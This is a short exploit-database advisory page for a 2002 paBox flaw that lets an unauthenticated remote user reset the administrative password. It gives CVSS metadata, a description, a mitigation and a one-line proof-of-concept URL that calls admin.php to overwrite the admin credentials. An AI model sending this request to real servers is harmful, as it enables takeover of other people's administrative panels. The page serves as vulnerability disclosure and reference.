header-logo
Suggest Exploit
vendor:
paBox
by:
SecurityFocus
7.5
CVSS
HIGH
Unauthenticated Remote Password Reset
287
CWE
Product Name: paBox
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

paBox Unauthenticated Remote Password Reset

paBox is prone to an issue that may allow unauthenticated remote users to reset administrative passwords. This could permit unauthorized access to the administrative Control Panel. An attacker can exploit this issue by sending a specially crafted HTTP request to the vulnerable server.

Mitigation:

Administrators are advised to disable the 'admin.php' script or restrict access to it.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8067/info

paBox is prone to an issue that may allow unauthenticated remote users to reset administrative passwords. This could permit unauthorized access to the administrative Control Panel.

http://www.example.com/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin

Navigation

Suggest Exploit

Services By CQR